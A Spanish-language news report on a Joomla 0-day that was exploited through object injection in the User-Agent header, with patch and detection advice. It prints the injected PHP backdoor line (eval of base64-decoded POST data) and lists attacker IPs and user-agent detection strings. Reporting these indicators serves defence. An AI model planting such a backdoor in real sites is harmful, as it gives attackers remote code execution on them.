El equipo de seguridad de Joomla emite parche de seguridad sobre vulnerabilidad de 0-day que afecta las versiones 1.5 hasta 3.4, la cual ya se ha visto usada para comprometer sitios Joomla de forma masiva.
El parche de seguridad fue publicado el día lunes pero no sin que fuera explotada por lo menos dos días de manera masiva dejando años, confirman investigadores de seguridad de Securi.
La vulnerabilidad es explotada inyectando código arbitrario mediante la cabecera HTTP User-Agent que permite la ejecución remota de comandos, según Daniel Cid de Securi en un aviso publicado el día lunes.
La vulnerabilidad afecta a todas las versiones de Joomla desde 1.5 hasta 3.4. Los parches de seguridad ya están disponibles para las versiones antiguas del sistema gestor de contenido, tales como 2.5 y menores a ésta, que actualmente ya no cuentan con soporte.
«El exploit que se está usando emplea una vulnerabilidad de inyección de objeto para insertar el siguiente código en la base de datos», dijo Cid:
eval [(] base64_decode [(] [$]_POST[111])) ;
«Es un backdoor que ejecuta cualquier código PHP ingresado en la variable 111», dijo Cid en un análisis técnico publicado sobre la vulnerabilidad.
Para mitigar ésta vulnerabilidad es recomendable actualizar su instalación Joomla lo más pronto posible a la versión 3.4.6 o aplicar los parches de seguridad ofrecidos por el equipo de seguridad de Joomla.
Adicionalmente, para verificar si su sitio web ha sido comprometido, debe asegurarse de que éstas direcciones IPs no están en sus archivos de log 146.0.72.83, 74.3.170.33 o 194.28.174.106, que es de donde la mayoría de los ataques provieron. También puede verificarse buscando la cadena de texto «JDatabaseDriverMysqli» o «O:» en la cabecera user-agent.
